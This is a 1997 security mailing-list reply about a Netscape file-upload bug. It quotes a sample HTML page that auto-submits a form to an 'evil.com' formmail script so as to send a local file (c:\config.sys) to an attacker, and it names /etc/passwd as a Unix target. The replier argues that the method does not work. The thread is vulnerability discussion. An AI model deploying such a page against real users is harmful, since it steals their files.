Re: Netscape Exploit

Justin C. Ferguson (jferg@ACM.ORG)
Sat, 14 Jun 1997 22:38:03 -0500

On Jun 14, you babbled something about:
> Here is a sample it isn't complete but you get the basic idea of what is
> going on

> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
> <BODY onLoad="daForm.submit()">
> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

Unless I'm missing something here, this method _does_not_ work. This
was my first idea when I first heard about the bug as well, but from what I can
tell, it's not possible to set a value (or a defaultValue using JavaScript) for
a file type input. The only way even remotely possible way I can see to do
do this is perhaps through the fact that netscape caches form data for reposts,
and some trick here regarding reloading the page. If anybody's interested in
viewing the page I set up yesterday that does almost exactly what is listed
above, it's at http://acm.cs.umr.edu/~jferg/test1.html. (Yes, I will
guarantee that I'm not grabbing anybody's files here...)
On a side note, is anyone else but me entertained by the fact that
netscape claims this bug has "few real-world applications", since one must
know the exact name and path of the file, yet unix systems are vulnerable?
I'm thinking...ummm.../etc/passwd? *shrugs*

JF

--
Justin Ferguson - jferg@acm.org - jferg@usgs.gov - http://acm.cs.umr.edu/~jferg
 "I will stare at the sun until its light doesn't blind me...I will walk into
  the fire until its heat doesn't burn me...and I will feed the fire.  And into
  the fire, I'm reunited, into the fire, I am the spark..." - Sarah McLachlan